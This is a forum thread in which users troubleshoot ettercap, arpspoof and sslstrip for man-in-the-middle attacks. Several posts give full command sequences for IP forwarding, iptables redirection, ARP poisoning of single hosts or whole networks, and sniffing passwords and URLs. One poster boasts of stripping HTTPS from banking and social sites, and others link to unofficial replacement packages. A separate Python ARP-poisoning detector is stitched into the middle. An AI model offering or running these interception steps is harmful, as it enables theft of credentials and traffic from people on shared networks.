
Thread: Ettercap Problem(s)

  1. #1
    Join Date
    2013-Sep
    Posts
    11

    Ettercap Problem(s)

    Hi guys,

    First thing, I know there's a lot of ettercap threads lying around the forums and all over the internet but I can't put my finger on the issue.

    I will start by saying I am running Kali Linux and Backtrack 5 R2 and R3 in a VM. I simply cannot get ettercap to work. I've tried the GUI and command line. I've edited the config following tutorials.
    I've made sure it is forwarding (e.g. echo 1 > /proc/sys/net/ipv4/ip_forward) but ettercap simply won't capture any data. At one stage it did work on my BTR2 but does not now. I can't get SSLstrip to work either..

    I've tried countless MITM scripts that "should" do all the required setting up. I've updated ettercap to the latest update and still nothing. I'm stuck and have nowhere to turn to. Just wondering if it's my setup config or my network is just immune to ettercap?

    I've started blank copies of all OSes to see if I had made any mistakes and yet it still won't work. Any help would be greatly appreciated. I would like to get this sorted once and for all!

    Thanks.

    P.S If you need any more information I will be happy to edit and post them.

  2. #2
    Join Date
    2013-May
    Posts
    9
    try to boot from a live usb instead of using vm's for compatibility issues

  3. #3
    Yep, boot from Live or install it.
    VM is always a trick-road and should not be used as permanent solution. Not much support for VM too.

    Anyway, post logs or error message maybe I can help

  4. #4
    Are you arp poisoning? If you're not, then no traffic will get redirected to you, meaning none will be sslstripped and nothing will be logged

  5. #5
    This is what I do
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    sslstrip -k -l 8080 #to listen for traffic going through your redirected port, 8080

    I then move that terminal and open a new one and use

    arpspoof -i wlan0 -t 192.168.1.20 192.168.1.1 (FIRST ONE IS TARGET, SECOND IS GATEWAY)

    and leave that open

    afterwards you can run urlsnarf -i wlan0 to sniff urls

    for credentials, I open another window and use

    ettercap -T -q -i wlan0 #to sniff for passwords ONLY.

    Make sure you removed the comments from iptables redir on and off. If you want to use etter for everything and not use arpspoof, follow those steps but after the sslstrip step use

    ettercap -T -q -i wlan0 -M arp // //

    That will spoof the whole network.
    Or do /191.168.4.1/ for a specific ip

  6. #6
    Join Date
    2013-Sep
    Posts
    11
    Thanks for the replies. I will give them a go. I generally use VM because it allows you to save data. I will try the live CDs. Is there a way to arpspoof the entire network and not one target at a time?

    P.S Doing the following steps suggested, I always seem to run into the untrusted certificate. Any clues?

  7. #7
    Join Date
    2013-Sep
    Posts
    11
    Update: After giving them a go, I found only some sites will give data, regardless of whether it is https or http. I cannot get sslstrip to strip the https down to http. It simply will not work. I'm confused, I've followed the steps.

  8. #8
    You're supposed to get untrusted since it's becoming http and not https, it's no longer safe. Most people ignore it. It could be because you're using a VM. I have it installed to my HD and it strips everything. PayPal, banks, Facebook, twitter. To poison the whole network, I use ettercap.
    ettercap -T -q -i wlan0 -M arp //

  9. #9
    I'm just confirming that I have that method working flawlessly. I use 64 bit and it's my only OS on my PC. everything is updated to the latest version. It strips every site.

  10. #10
    Join Date
    2013-Sep
    Posts
    11
    I was using a live cd of kali. I'll have to have a play around and see what I can do.

  11. #11
    Yeah I know there are some issues with a live CD. Sorry, I can't help you with the live CD issue :/

  12. #12
    Join Date
    2013-Sep
    Posts
    11
    After I accept the untrusted cert, it just times out? You got any clues Lord?

  13. #13
    I don't know why it's doing that :/ has to be from the live boot. I get 0 problems with the HD install

  14. #14
    Join Date
    2013-Sep
    Posts
    11
    Mm, alright. Might need to try a HD install.

  15. #15
    Let me know if your issue is resolved

  16. #16
    Join Date
    2013-May
    Location
    world wide
    Posts
    10
    hi,
    every time i want to do MITM, i just use this syntax

    ettercap -TqM arp:remote -i wlan0 // //
    press L to see if there are any clients online on the network you're connected to.

    then press P to show available plugins
    i use
    ssl_strip
    and somehow i can get a lot of https credential
    Don't fix it if not broken, don't broke it if can't fix

  17. #17
    Join Date
    2013-Sep
    Posts
    11
    Quote Originally Posted by kirito View Post
    hi,
    every time i want to do MITM, i just use this syntax



    press L to see if there are any clients online on the network you're connected to.

    then press P to show available plugins
    i use

    and somehow i can get a lot of https credential
    Is that with a live cd? HDD install? VM?

  18. #18
    Join Date
    2013-Sep
    Posts
    11
    Update: Ettercap seems to capture most HTTP details fine, but it won't with sslstrip.. Sometimes it will time out, won't capture details, may give untrusted cert but still won't capture. I'm under the impression that it's an issue with sslstrip.

  19. #19
    my command for sslstrip is sslstrip -k -l 8080

    I used it yesterday and it stripped everything

  20. #20
    This is exactly what I do in this order

    echo 1 > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    sslstrip -k -l 8080

    then

    arpspoof -i eth1 -t 192.168.0.13 192.168.0.1 (FIRST ONE IS TARGET, SECOND IS GATEWAY)

    after you can run urlsnarf -i wlan0 to sniff urls

    driftnet -i wlan0 to sniff pictures

    or run ettercap -T -q -i wlan0 to sniff passwords

    if you want to use only ettercap, follow the above instructions but instead of arpspoof type
    ettercap -T -q -i wlan0 -M arp // // to sniff the whole network
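
Editor's added example (not part of any post in this thread): the ARP poisoning described in posts #5 and #20 leaves a trace in every affected host's neighbour table, because the gateway's IP starts resolving to another machine's MAC. The Python below compares a trusted baseline of `ip neigh show` output with a later snapshot; the addresses, MACs and function names are constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Resolved IPv4 entries of `ip neigh show`, e.g.
# "192.168.1.1 dev wlan0 lladdr 02:00:00:00:00:01 REACHABLE"
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+"
    r"lladdr\s+(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)

# Constructed sample data (not taken from the thread).
BASELINE = """\
192.168.1.1 dev wlan0 lladdr 02:00:00:00:00:01 REACHABLE
192.168.1.20 dev wlan0 lladdr 02:00:00:00:00:20 STALE
192.168.1.77 dev wlan0  FAILED
192.168.1.128 dev wlan0 lladdr 02:00:00:00:00:80 REACHABLE
"""
POISONED = """\
192.168.1.1 dev wlan0 lladdr 02:00:00:00:00:80 REACHABLE
192.168.1.20 dev wlan0 lladdr 02:00:00:00:00:80 REACHABLE
192.168.1.128 dev wlan0 lladdr 02:00:00:00:00:80 STALE
"""


def parse_neigh(text):
    """Return {ip: mac}. FAILED/INCOMPLETE entries have no lladdr and are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table


def check_arp(baseline, current, gateway_ip):
    """Compare a trusted baseline neighbour table with the current one."""
    # IPs whose MAC differs from the value recorded while the network was clean.
    changed = {
        ip: (baseline[ip], mac)
        for ip, mac in current.items()
        if ip in baseline and baseline[ip] != mac
    }
    # MACs claimed by more than one IP. Proxy ARP and multi-homed hosts can
    # cause this legitimately, so treat it as a lead, not as proof.
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    shared = {
        mac: sorted(ips, key=ipaddress.ip_address)
        for mac, ips in by_mac.items()
        if len(ips) > 1
    }
    gw_mac = current.get(gateway_ip)
    gateway_suspect = gateway_ip in changed or gw_mac in shared
    # The host that owned the gateway's current MAC in the baseline is the
    # most likely source of the forged replies.
    likely_source = None
    if gateway_suspect:
        owners = [ip for ip, mac in baseline.items()
                  if mac == gw_mac and ip != gateway_ip]
        likely_source = owners[0] if owners else None
    return {
        "changed": changed,
        "shared": shared,
        "gateway_suspect": gateway_suspect,
        "likely_source": likely_source,
    }


if __name__ == "__main__":
    report = check_arp(parse_neigh(BASELINE), parse_neigh(POISONED), "192.168.1.1")
    for key, value in report.items():
        print(f"{key}: {value}")
```

A static ARP entry for the gateway on sensitive hosts, or dynamic ARP inspection on the switch, removes the condition this check looks for.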

  21. #21
    Join Date
    2013-Sep
    Posts
    11
    Okay, I've got it to semi-work. Mostly only on IE. If I type paypal.com in the browser, it will automatically go to http. But if I type or click a recent link such as https://www.paypal.com then it won't strip it. It may give the untrusted cert but after clicking ignore or whatever it may be, it just continues on with https.

    Is this how it's meant to act? Or is there another issue at hand.

    Examples
    IE = Strips if I type paypal.com and it will redirect to http://www.paypal.com, but not if you click a recent link with https in the link. Or, type https yourself.
    Firefox = Will give untrusted cert, by accepting it may time out, keep asking for the cert to be accepted.
    Chrome = Will give untrusted cert but will not allow you to accept and move on.

    Edit: added examples.
    Last edited by AdamElite; 2013-09-12 at 13:54.

  22. #22
    I've tested it with safari and firefox. You may have to clear your cache.

  23. #23
    Join Date
    2013-Sep
    Posts
    11
    Coming back with an update, doing some experimenting on the live cd. I've noticed I can capture everything fine on my other laptop. It won't capture on the actual attacking machine, and it won't capture at all on another laptop. Odd init?

  24. #24
    Join Date
    2013-Jun
    Posts
    123
    I have kali installed on my hd (mbp Intel i7 2.3GHz) everything is running beautifully! I am just starting with ettercap -G. I have watched youtube videos, read forums, etc... It is running really slow on victim computer (my iMac).

    I am using these as my main resources:
    ***REMOVED***
    http://www.hackcommunity.com/Thread-...tack-SSL-Strip
    i have modified my ettercap to run as admin
    i am doing the port forward (even though i don't believe that i need to do this as i am on my LAN)
    unified sniffing, my interface is wlan0 for wifi, scan hosts (i find 5), choose my victim as Target 1, and router as Target 2
    arp poisoning and start sniffing

    this causes the network on victim computer to be very slow, so slow in fact that pages won't load in browser.
    however, the speed on my mbp that i am working from with ettercap -G has no speed issues when browsing.

    Can someone please point out my errors?

    any and all help appreciated!

    Thanks
    Last edited by g0tmi1k; 2014-04-01 at 12:19. Reason: Youtube Rule

  25. #25
    Join Date
    2013-Sep
    Posts
    11
    Quote Originally Posted by brazen View Post
    I have kali installed on my hd (mbp Intel i7 2.3GHz) everything is running beautifully! I am just starting with ettercap -G. I have watched youtube videos, read forums, etc... It is running really slow on victim computer (my iMac).

    I am using these as my main resources:
    *RMOVED*
    http://www.hackcommunity.com/Thread-...tack-SSL-Strip

    i have modified my ettercap to run as admin
    i am doing the port forward (even though i don't believe that i need to do this as i am on my LAN)
    unified sniffing, my interface is wlan0 for wifi, scan hosts (i find 5), choose my victim as Target 1, and router as Target 2
    arp poisoning and start sniffing

    this causes the network on victim computer to be very slow, so slow in fact that pages won't load in browser.
    however, the speed on my mbp that i am working from with ettercap -G has no speed issues when browsing.

    Can someone please point out my errors?

    any and all help appreciated!

    Thanks
    What version of ettercap are you using? Try using the command line and see if that helps.
    Last edited by g0tmi1k; 2014-04-01 at 12:19. Reason: Youtube

  26. #26
    Join Date
    2013-Oct
    Posts
    2
    Hi mate,

    i have also found the same issue when running 'ettercap' within a VM. I had mine set up so the laptop i was using had two alfa cards connected, one for the victim (windows) and one for attack (kali), both connected to my captive portal. After spending the best part of 8 hours trying to work out why they wouldn't work i attempted exactly the same steps using a live boot and it worked fine.

    The only conclusion i can come to is that it doesn't like running within a virtual environment. I am not sure why since many of the threads i read didn't have any fix for the issue.

    It would be great if someone on here could solve the problem since i now have rebuild my Kali linux install on a different laptop and have my VM already set up how i want it.

  27. #27
    Join Date
    2013-Jun
    Posts
    123
    I have no VM involved with my setup. I have kali on my laptop and attacking my iMac. :/

  28. #28
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by brazen View Post
    I have kali installed on my hd (mbp Intel i7 2.3GHz) everything is running beautifully! I am just starting with ettercap -G. I have watched youtube videos, read forums, etc... It is running really slow on victim computer (my iMac).

    I am using these as my main resources:
    ***YOUTUBE****
    http://www.hackcommunity.com/Thread-...tack-SSL-Strip

    i have modified my ettercap to run as admin
    i am doing the port forward (even though i don't believe that i need to do this as i am on my LAN)
    unified sniffing, my interface is wlan0 for wifi, scan hosts (i find 5), choose my victim as Target 1, and router as Target 2
    arp poisoning and start sniffing

    this causes the network on victim computer to be very slow, so slow in fact that pages won't load in browser.
    however, the speed on my mbp that i am working from with ettercap -G has no speed issues when browsing.

    Can someone please point out my errors?

    any and all help appreciated!

    Thanks
    hi
    if you want to try this test-mode:
    https://vimeo.com/77961423
    bye

    PS:sorry for the bad write-explanation during the CAMREC
    Last edited by g0tmi1k; 2014-04-01 at 12:20. Reason: Youtube

  29. #29
    Join Date
    2013-Jun
    Posts
    123
    great video ... very impressive.

    a few rookie questions:
    1. does this work only on eth0 or will this work with wlan0 as well (i am not using a vm).
    2. once those changes are made, they are permanent? I won't need to do port forwarding and sslstrip everytime, or do I still need to do that everytime?
    3. Are you able to show that video in a higher resolution as there are some things that I am not able to see clearly.

    THANKS for your help... I can't wait to try this out!

  30. #30
    Join Date
    2013-Jun
    Posts
    123
    i tried this, but i think i made errors as i wasn't able to view clearly and was guessing on some text. i was not able to successfully do the arpspoofing section

  31. #31
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by brazen View Post
    great video ... very impressive.

    a few rookie questions:
    1. does this work only on eth0 or will this work with wlan0 as well (i am not using a vm).
    2. once those changes are made, they are permanent? I won't need to do port forwarding and sslstrip everytime, or do I still need to do that everytime?
    3. Are you able to show that video in a higher resolution as there are some things that I am not able to see clearly.

    THANKS for your help... I can't wait to try this out!
    hi @ brazen

    However, I can express my humble thought (I'm a mechanic)...
    Now all "providers" use secure authentication (HTTPS) and all (updated) browsers can "recognize" and "lock" the "arp-attacks" on the network via "security certificates".
    For years sslstrip (the tool) has given us a hand to try to escape this!
    But it is not always a party!! (e.g. twitter, facebook, etc.)
    The only thing that I've noticed in my home lab test (in recent times) is that ARP poisoning created with ettercap creates problems: slow traffic, certificate problems (by stripping as well), etc.
    And the good old dsniff (arpspoof) [in my case I do NOT use the default version in kali] is a lot less trouble!!

    These are just my thoughts. I am not a "technical" person... I just test in my house!

    About your questions:
    1 works fine on wifi (wlan) on a physical machine
    2 you can switch ip_forward on/off && sslstrip is necessary for "stripped" https to http traffic
    3 NO, I suck at making videos!

    bye

  32. #32
    Join Date
    2013-Jun
    Posts
    123
    zimmaro...
    awesome video... i was able to view it just fine on my tablet. I did just what you said and it worked great!

    just as a note: i went to install some packages afterwards and i was getting errors. i had to do a 'apt-get -f install' with no packages. this forced the dsniff to go back up to 22 instead of the 18. so the whole process would need to be completed again if anyone else goes to install certain packages afterwards (not sure if this happens with all packages or not).

    2 thumbs up! thanks again zimmaro!

  33. #33
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by brazen View Post
    zimmaro...
    awesome video... i was able to view it just fine on my tablet. I did just what you said and it worked great!

    just as a note: i went to install some packages afterwards and i was getting errors. i had to do a 'apt-get -f install' with no packages. this forced the dsniff to go back up to 22 instead of the 18. so the whole process would need to be completed again if anyone else goes to install certain packages afterwards (not sure if this happens with all packages or not).

    2 thumbs up! thanks again zimmaro!
    @brazen
    if you want
    in MY kali (standard kernel) I did it this way
    ###download a ""good-dsniff"" package[32 or 64](my-dropbox):
    https://www.dropbox.com/sh/5uagx5jg4jvkoys/VgGzaLXIiB

    ###remove default:
    apt-get remove dsniff

    ###install a download package:
    dpkg -i dsniff_2.4b1+debian.............

    ###if you are satisfied with this version (18) && don't want to return to the default (22) after the next apt-get upgrade, put a LOCK on the single package (dsniff)!!!
    echo dsniff hold | dpkg --set-selections

    after this, if you run apt-get upgrade.... you get, in MY case:

    root@kali:~# apt-get dist-upgrade
    Lettura elenco dei pacchetti... Fatto
    Generazione albero delle dipendenze
    Lettura informazioni sullo stato... Fatto
    Calcolo dell'aggiornamento... Eseguito
    I seguenti pacchetti sono stati mantenuti alla versione attuale:
    chntpw dsniff gpsd libnfc4 mfcuk mfoc
    I seguenti pacchetti saranno aggiornati:
    set
    1 aggiornati, 0 installati, 0 da rimuovere e 6 non aggiornati.
    È necessario scaricare 44,9 MB di archivi.
    Dopo quest'operazione, verranno occupati 0 B di spazio su disco.
    Continuare [S/n]?

    .............THE REDS are MY(only-MY-for test) LOCKED package
    Last edited by zimmaro; 2013-10-30 at 09:12.

  34. #34
    Join Date
    2013-Jun
    Posts
    123
    root@kali:~# dpkg -i dsniff_2.4b1+-18_amd64.deb
    Selecting previously unselected package dsniff.
    (Reading database ... 345366 files and directories currently installed.)
    Unpacking dsniff (from dsniff_2.4b1+-18_amd64.deb) ...
    dpkg: dependency problems prevent configuration of dsniff:
    dsniff depends on libdb4.6; however:
    Package libdb4.6 is not installed.
    dsniff depends on libssl0.9.8 (>= 0.9.8f-5); however:
    Package libssl0.9.8 is not installed.

    dpkg: error processing dsniff (--install):
    dependency problems - leaving unconfigured
    Processing triggers for man-db ...
    Errors were encountered while processing:
    dsniff

    note: i had downloaded the 18 version from online yesterday and it worked great. i went and downloaded yours as well (wondering if you had made any modifications to it) and when I do the dpkg -i ... i get the result as posted in this post above.
    i continued forward and did the dpkg --list |grep dsniff to see if the 18 did install. it seems to have installed, but now when i get to the point of : arpspoof -i wlan0 192.168.1.1
    all of the computers (except the one i am working from) lose internet connection.

    any ideas on what I am doing wrong?
    please advise
    Last edited by brazen; 2013-10-31 at 13:44. Reason: update

  35. #35
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301

    Quote Originally Posted by brazen View Post
    root@kali:~# dpkg -i dsniff_2.4b1+-18_amd64.deb
    Selecting previously unselected package dsniff.
    (Reading database ... 345366 files and directories currently installed.)
    Unpacking dsniff (from dsniff_2.4b1+-18_amd64.deb) ...
    dpkg: dependency problems prevent configuration of dsniff:
    dsniff depends on libdb4.6; however:
    Package libdb4.6 is not installed.
    dsniff depends on libssl0.9.8 (>= 0.9.8f-5); however:
    Package libssl0.9.8 is not installed.

    dpkg: error processing dsniff (--install):
    dependency problems - leaving unconfigured
    Processing triggers for man-db ...
    Errors were encountered while processing:
    dsniff

    note: i had downloaded the 18 version from online yesterday and it worked great. i went and downloaded yours as well (wondering if you had made any modifications to it) and when I do the dpkg -i ... i get the result as posted in this post above.
    i continued forward and did the dpkg --list |grep dsniff to see if the 18 did install. it seems to have installed, but now when i get to the point of : arpspoof -i wlan0 192.168.1.1
    all of the computers (except the one i am working from) lose internet connection.

    any ideas on what I am doing wrong?
    please advise
    hi@brazen you ...nothing...

    sorry !!!
    that forgetful that are
    fix the 2 dependencies!!!!!!
    https://www.dropbox.com/sh/l63szq3gjo5ju5x/H53OBAaC8q
    dpkg -i for 2 packets && after dpkg for dsniff

  36. #36
    Join Date
    2013-Jun
    Posts
    123
    Thank you. I'll try this tomorrow.

    You are a great help. I hope to know all that you know one day!

  37. #37
    Join Date
    2013-Jun
    Posts
    123
    just did it. works perfect. thank you. bye

  38. #38
    Join Date
    2013-Jun
    Posts
    123
    root@kali:~# find / -name etter.conf
    /etc/ettercap/etter.conf
    /etc/etter.conf
    root@kali:~#


    which etter.conf file needs to be adjusted? or both?
    i was getting an error in ettercap -G:

    Listening on:
    wlan0 -> B8:8D:12:30:6B:F2
    192.168.1.128/255.255.255.0
    fe80::ba8d:12ff:fe30:6bf2/64

    Privileges dropped to UID 0 GID 0... (EDIT ~ this was saying 65534 due to having the # in etter.conf file, which is why i changed both files by deleting # and changing 65534 to 0). i went and checked both files. one was changed, the other was not. so i also changed the UID and GID on the second file as well (0).

    the other computers on the network are not able to connect to websites on the internet when i do the: arpspoof -i wlan0 192.168.1.1
    sometimes, if i do the arpspoof -i wlan0 192.168.1.1 and then turn it off (by closing that terminal) and issue the command a second time... it will then work, but not always

    everytime i get it working, i change something and i end up back here asking questions... lol

    also, what is the difference between using kali 10 vs 10.7-trunk?
    Last edited by brazen; 2013-11-01 at 13:27.

  39. #39
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by brazen View Post
    root@kali:~# find / -name etter.conf
    /etc/ettercap/etter.conf
    /etc/etter.conf
    root@kali:~#


    which etter.conf file needs to be adjusted? or both?
    i was getting an error in ettercap -G:

    Listening on:
    wlan0 -> B8:8D:12:30:6B:F2
    192.168.1.128/255.255.255.0
    fe80::ba8d:12ff:fe30:6bf2/64

    Privileges dropped to UID 0 GID 0... (EDIT ~ this was saying 65534 due to having the # in etter.conf file, which is why i changed both files by deleting # and changing 65534 to 0). i went and checked both files. one was changed, the other was not. so i also changed the UID and GID on the second file as well (0).

    the other computers on the network are not able to connect to websites on the internet when i do the: arpspoof -i wlan0 192.168.1.1
    sometimes, if i do the arpspoof -i wlan0 192.168.1.1 and then turn it off (by closing that terminal) and issue the command a second time... it will then work, but not always

    everytime i get it working, i change something and i end up back here asking questions... lol

    also, what is the difference between using kali 10 vs 10.7-trunk?
    in MY-kali is in /etc/ettercap/ && I adjusted these lines:

    root@kali:~# cat /etc/ettercap/etter.conf |grep -e 'ec_' -e 'iptables'
    ec_uid = 0 # nobody is the default
    ec_gid = 0 # nobody is the default
    # or set the ec_uid to 0, in order to be sure the cleanup script will be
    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    root@kali:~#

  40. #40
    Join Date
    2013-Jun
    Posts
    123
    here is mine:

    root@kali:~# cat /etc/ettercap/etter.conf |grep -e 'ec_' -e 'iptables'
    ec_uid = 0 # nobody is the default
    ec_gid = 0 # nobody is the default
    # or set the ec_uid to 0, in order to be sure the cleanup script will be
    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    root@kali:~#


    EDIT - i think my vpn was messing things up. i was doing this while connected to vpn.
    Last edited by brazen; 2013-11-01 at 20:31.
